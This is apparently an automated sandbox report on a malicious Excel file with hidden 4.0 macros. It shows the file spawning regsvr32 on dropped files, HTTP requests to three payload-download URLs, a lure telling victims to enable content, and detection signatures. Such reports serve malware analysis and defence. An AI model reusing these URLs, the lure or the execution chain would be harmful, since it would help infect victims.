Loading ...

Play interactive tourEdit tour

Windows Analysis Report doc-379851424.xls

Overview

General Information

Sample Name:doc-379851424.xls
Analysis ID:501250
MD5:6941299c6a83bb6ae73f5a9ef8eefb4d
SHA1:c1de6800c74673520fbc4c15d5ab67af1ef84de9
SHA256:346ac88b13c71aeb67501f63940919f60ad502d6d350016aecaa2ef4ec3c1d75
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Regsvr32 Command Line Without DLL
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Yara signature match
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
May sleep (evasive loops) to hinder dynamic analysis
Document contains embedded VBA macros
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
IP address seen in connection with other malware

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1296 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 1200 cmdline: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2676 cmdline: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test1.test MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 196 cmdline: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test2.test MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
doc-379851424.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x384aa:$s1: Excel
  • 0x39557:$s1: Excel
  • 0x34eb:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
doc-379851424.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Regsvr32 Command Line Without DLLShow sources
    Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test, CommandLine: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1296, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test, ProcessId: 1200
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test, CommandLine: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1296, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test, ProcessId: 1200

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: unknownHTTPS traffic detected: 172.93.99.178:443 -> 192.168.2.22:49167 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 101.0.112.4:443 -> 192.168.2.22:49168 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.179.242.179:443 -> 192.168.2.22:49169 version: TLS 1.2

    Software Vulnerabilities:

    barindex
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.93.99.178:443
    Source: global trafficDNS query: name: ohemaa.org
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.93.99.178:443
    Source: global trafficHTTP traffic detected: GET /HUVm9mDKLW9C/ocrafhh.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ohemaa.orgConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /xnkpOLnvlN6T/ocrafh.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: madieandme.com.auConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /xdOMlaB0XJ7/ocraf.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: amerident.com.doConnection: Keep-Alive
    Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
    Source: Joe Sandbox ViewIP Address: 172.93.99.178 172.93.99.178
    Source: Joe Sandbox ViewIP Address: 172.93.99.178 172.93.99.178
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
    Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
    Source: regsvr32.exe, 00000003.00000002.462254471.00000000048F0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.455662884.0000000004960000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
    Source: regsvr32.exe, 00000003.00000002.462254471.00000000048F0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.455662884.0000000004960000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
    Source: regsvr32.exe, 00000003.00000002.462254471.00000000048F0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.455662884.0000000004960000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
    Source: regsvr32.exe, 00000003.00000002.462803298.0000000004AD7000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.455899439.0000000004B47000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
    Source: regsvr32.exe, 00000003.00000002.462803298.0000000004AD7000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.455899439.0000000004B47000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
    Source: regsvr32.exe, 00000003.00000002.460826277.00000000039A0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.455146121.0000000003A40000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
    Source: regsvr32.exe, 00000003.00000002.460397827.0000000001D20000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.454729023.0000000001CA0000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.447917866.0000000001D10000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
    Source: regsvr32.exe, 00000003.00000002.462803298.0000000004AD7000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.455899439.0000000004B47000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
    Source: regsvr32.exe, 00000003.00000002.462803298.0000000004AD7000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.455899439.0000000004B47000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
    Source: regsvr32.exe, 00000003.00000002.460826277.00000000039A0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.455146121.0000000003A40000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
    Source: regsvr32.exe, 00000003.00000002.462254471.00000000048F0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.455662884.0000000004960000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
    Source: regsvr32.exe, 00000003.00000002.462803298.0000000004AD7000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.455899439.0000000004B47000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
    Source: regsvr32.exe, 00000003.00000002.462254471.00000000048F0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.455662884.0000000004960000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
    Source: regsvr32.exe, 00000005.00000002.449039540.00000000049A0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ocrafhh[1].htmJump to behavior
    Source: unknownDNS traffic detected: queries for: ohemaa.org
    Source: global trafficHTTP traffic detected: GET /HUVm9mDKLW9C/ocrafhh.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ohemaa.orgConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /xnkpOLnvlN6T/ocrafh.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: madieandme.com.auConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /xdOMlaB0XJ7/ocraf.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: amerident.com.doConnection: Keep-Alive
    Source: unknownHTTPS traffic detected: 172.93.99.178:443 -> 192.168.2.22:49167 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 101.0.112.4:443 -> 192.168.2.22:49168 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.179.242.179:443 -> 192.168.2.22:49169 version: TLS 1.2

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Editing 18 '9 41' I 20 (D PROTECTED VIEW Be careful- files from the 1nterne :cted View.
    Source: Screenshot number: 4Screenshot OCR: Enable Content 25 26 (i) SECURITY WARNING Macros have been disabled. Enable Content 27 28 29 3
    Source: Screenshot number: 8Screenshot OCR: Enable Editing d 18 19 20 (D PROTECTED VIEW Be careful - files from the Internet can contain viru
    Source: Screenshot number: 8Screenshot OCR: Enable Content 25 26 (i) SECURITY WARNING Macros have been disabled. Enable Content 27 28 29 3
    Source: Document image extraction number: 0Screenshot OCR: Enable Editing 0 PROTECTED VIEW Be careful - files from the Internet can contain viruses. Unless yo
    Source: Document image extraction number: 0Screenshot OCR: Enable Content OSECURITY WARNING Macros have been disabled. Enable Content om If you are using a m
    Source: Document image extraction number: 1Screenshot OCR: Enable Editing (D PROTECTED VIEW Be careful - files from the Internet can contain viruses. Unless y
    Source: Document image extraction number: 1Screenshot OCR: Enable Content OSECURITY WARNING Macros have been disabled. Enable Content om If you are using a m
    Source: doc-379851424.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
    Source: doc-379851424.xlsOLE indicator, VBA macros: true
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: doc-379851424.xlsOLE indicator, Workbook stream: true
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test1.test
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test2.test
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.testJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test1.testJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test2.testJump to behavior
    Source: regsvr32.exe, 00000003.00000002.462254471.00000000048F0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.455662884.0000000004960000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR656.tmpJump to behavior
    Source: classification engineClassification label: mal68.expl.winXLS@7/0@3/3
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\System32\regsvr32.exeAutomated click: OK
    Source: C:\Windows\System32\regsvr32.exeAutomated click: OK
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\regsvr32.exe TID: 2416Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\System32\regsvr32.exe TID: 668Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\System32\regsvr32.exe TID: 2088Thread sleep count: 36 > 30Jump to behavior
    Source: C:\Windows\System32\regsvr32.exe TID: 684Thread sleep time: -60000s >= -30000sJump to behavior

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: doc-379851424.xls, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting1Path InterceptionProcess Injection1Disable or Modify Tools1OS Credential DumpingVirtualization/Sandbox Evasion1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection1Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol13Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferIngress Tool Transfer2SIM Card SwapCarrier Billing Fraud

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    No Antivirus matches

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    ohemaa.org0%VirustotalBrowse
    amerident.com.do1%VirustotalBrowse
    madieandme.com.au0%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    https://ohemaa.org/HUVm9mDKLW9C/ocrafhh.html0%Avira URL Cloudsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    https://madieandme.com.au/xnkpOLnvlN6T/ocrafh.html0%Avira URL Cloudsafe
    http://www.%s.comPA0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://servername/isapibackend.dll0%Avira URL Cloudsafe
    https://amerident.com.do/xdOMlaB0XJ7/ocraf.html0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    ohemaa.org
    172.93.99.178
    truefalseunknown
    amerident.com.do
    108.179.242.179
    truefalseunknown
    madieandme.com.au
    101.0.112.4
    truefalseunknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://ohemaa.org/HUVm9mDKLW9C/ocrafhh.htmlfalse
    • Avira URL Cloud: safe
    unknown
    https://madieandme.com.au/xnkpOLnvlN6T/ocrafh.htmlfalse
    • Avira URL Cloud: safe
    unknown
    https://amerident.com.do/xdOMlaB0XJ7/ocraf.htmlfalse
    • Avira URL Cloud: safe
    unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkregsvr32.exe, 00000003.00000002.462803298.0000000004AD7000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.455899439.0000000004B47000.00000002.00020000.sdmpfalse
      high
      http://www.windows.com/pctv.regsvr32.exe, 00000005.00000002.449039540.00000000049A0000.00000002.00020000.sdmpfalse
        high
        http://investor.msn.comregsvr32.exe, 00000003.00000002.462254471.00000000048F0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.455662884.0000000004960000.00000002.00020000.sdmpfalse
          high
          http://www.msnbc.com/news/ticker.txtregsvr32.exe, 00000003.00000002.462254471.00000000048F0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.455662884.0000000004960000.00000002.00020000.sdmpfalse
            high
            http://www.icra.org/vocabulary/.regsvr32.exe, 00000003.00000002.462803298.0000000004AD7000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.455899439.0000000004B47000.00000002.00020000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.regsvr32.exe, 00000003.00000002.460826277.00000000039A0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.455146121.0000000003A40000.00000002.00020000.sdmpfalse
              high
              http://investor.msn.com/regsvr32.exe, 00000003.00000002.462254471.00000000048F0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.455662884.0000000004960000.00000002.00020000.sdmpfalse
                high
                http://www.%s.comPAregsvr32.exe, 00000003.00000002.460826277.00000000039A0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.455146121.0000000003A40000.00000002.00020000.sdmpfalse
                • URL Reputation: safe
                low
                http://windowsmedia.com/redir/services.asp?WMPFriendly=trueregsvr32.exe, 00000003.00000002.462803298.0000000004AD7000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.455899439.0000000004B47000.00000002.00020000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://www.hotmail.com/oeregsvr32.exe, 00000003.00000002.462254471.00000000048F0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.455662884.0000000004960000.00000002.00020000.sdmpfalse
                  high
                  http://servername/isapibackend.dllregsvr32.exe, 00000003.00000002.460397827.0000000001D20000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.454729023.0000000001CA0000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.447917866.0000000001D10000.00000002.00020000.sdmpfalse
                  • Avira URL Cloud: safe
                  low

                  Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public

                  IPDomainCountryFlagASNASN NameMalicious
                  101.0.112.4
                  madieandme.com.auAustralia
                  55803DIGITALPACIFIC-AUDigitalPacificPtyLtdAustraliaAUfalse
                  108.179.242.179
                  amerident.com.doUnited States
                  46606UNIFIEDLAYER-AS-1USfalse
                  172.93.99.178
                  ohemaa.orgUnited States
                  23470RELIABLESITEUSfalse

                  General Information

                  Joe Sandbox Version:33.0.0 White Diamond
                  Analysis ID:501250
                  Start date:12.10.2021
                  Start time:17:45:36
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 6m 41s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Sample file name:doc-379851424.xls
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                  Number of analysed new started processes analysed:7
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal68.expl.winXLS@7/0@3/3
                  EGA Information:Failed
                  HDC Information:Failed
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .xls
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Found warning dialog
                  • Click Ok
                  • Attach to Office via COM
                  • Scroll down
                  • Close Viewer
                  Warnings:
                  Show All
                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  17:46:35API Interceptor127x Sleep call for process: regsvr32.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  101.0.112.4doc-220808714.xlsGet hashmaliciousBrowse
                    doc-220808714.xlsGet hashmaliciousBrowse
                      108.179.242.179doc-220808714.xlsGet hashmaliciousBrowse
                        doc-220808714.xlsGet hashmaliciousBrowse
                          414d46ac_by_Libranalysis.xlsGet hashmaliciousBrowse
                            414d46ac_by_Libranalysis.xlsGet hashmaliciousBrowse
                              172.93.99.178430#U0437.jsGet hashmaliciousBrowse
                              • globalawardscheme.com/wp-content/cache/nextend/web/combined/sserv.jpg
                              430#U0437.jsGet hashmaliciousBrowse
                              • globalawardscheme.com/wp-content/cache/nextend/web/combined/sserv.jpg
                              34029.docGet hashmaliciousBrowse
                              • justevolvewithgrace.com/cgi-sys/suspendedpage.cgi
                              http://51.254.121.123/wp-content/0AR/com/USGet hashmaliciousBrowse
                              • justevolvewithgrace.com/cgi-sys/suspendedpage.cgi
                              8590170.docGet hashmaliciousBrowse
                              • justevolvewithgrace.com/cgi-sys/suspendedpage.cgi

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              ohemaa.orgdoc-220808714.xlsGet hashmaliciousBrowse
                              • 172.93.99.178
                              doc-220808714.xlsGet hashmaliciousBrowse
                              • 172.93.99.178
                              madieandme.com.audoc-220808714.xlsGet hashmaliciousBrowse
                              • 101.0.112.4
                              doc-220808714.xlsGet hashmaliciousBrowse
                              • 101.0.112.4
                              amerident.com.dodoc-220808714.xlsGet hashmaliciousBrowse
                              • 108.179.242.179
                              doc-220808714.xlsGet hashmaliciousBrowse
                              • 108.179.242.179
                              414d46ac_by_Libranalysis.xlsGet hashmaliciousBrowse
                              • 108.179.242.179
                              414d46ac_by_Libranalysis.xlsGet hashmaliciousBrowse
                              • 108.179.242.179

                              ASN

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              DIGITALPACIFIC-AUDigitalPacificPtyLtdAustraliaAUdoc-220808714.xlsGet hashmaliciousBrowse
                              • 101.0.112.4
                              doc-220808714.xlsGet hashmaliciousBrowse
                              • 101.0.112.4
                              ITT - PPCL-2021-0515-PKG4 - pipping and drilling Services.docGet hashmaliciousBrowse
                              • 116.90.56.138
                              Inquiry-Doors.exeGet hashmaliciousBrowse
                              • 101.0.91.38
                              product specification.exeGet hashmaliciousBrowse
                              • 101.0.117.102
                              7PUgGUWM2lGet hashmaliciousBrowse
                              • 182.160.170.135
                              Attached Quotation.exeGet hashmaliciousBrowse
                              • 101.0.117.102
                              Cd9EA600XXdm0tl.exeGet hashmaliciousBrowse
                              • 101.0.117.102
                              E8ljMuBj9LGet hashmaliciousBrowse
                              • 111.67.13.18
                              QcXQmNSaSpGet hashmaliciousBrowse
                              • 49.156.27.62
                              arm7Get hashmaliciousBrowse
                              • 111.67.13.28
